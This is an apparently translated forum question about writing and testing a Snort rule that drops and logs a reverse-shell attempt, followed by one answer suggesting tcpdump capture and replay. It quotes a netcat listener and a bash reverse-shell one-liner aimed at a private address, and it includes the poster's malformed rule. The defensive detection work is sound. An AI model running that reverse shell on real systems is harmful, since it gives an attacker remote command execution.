我的SNORT规则有什么问题,错误以及如何对其进行测试?

问题描述 投票:0回答:1

我的任务是使用不区分大小写的ASCII字符串pport@ST(十六进制值)创建和测试Snort规则,将其阻止,并在攻击者尝试使用任一命令生成远程shell时记录日志:

侦听器:

nc -lvp 8

在远程计算机上执行Shell:

bash –i >& /dev/tcp/192.168.1.5/8 0>&1

这是我的规则,对于()的使用,我一直收到致命错误,该规则必须包含在其中。我只用十六进制写了规则,这很好。我以为我可以添加多个内容,我只是困惑自己的错误。还要感谢有关如何测试规则的指导。 Snort规则的新手,将不胜感激。

测试Snort规则:

drop any any -> any any \
(content:"|70 70 6f 72 74 40 53 54|";
content:"|bash –i >& /dev/tcp/192.168.1.5/8 0>&1|";
content:"|nc -lvp 8|";
msg:"block"; sid:1000111;)
rules snort intrusion-detection
1个回答
0
投票

我建议您在恶意活动期间使用tcpdump在攻击者的计算机上记录所有网络流量。记录的pcap文件将使您一次又一次地重放活动。这对于规则制定非常有用。

© www.soinside.com 2019 - 2024. All rights reserved.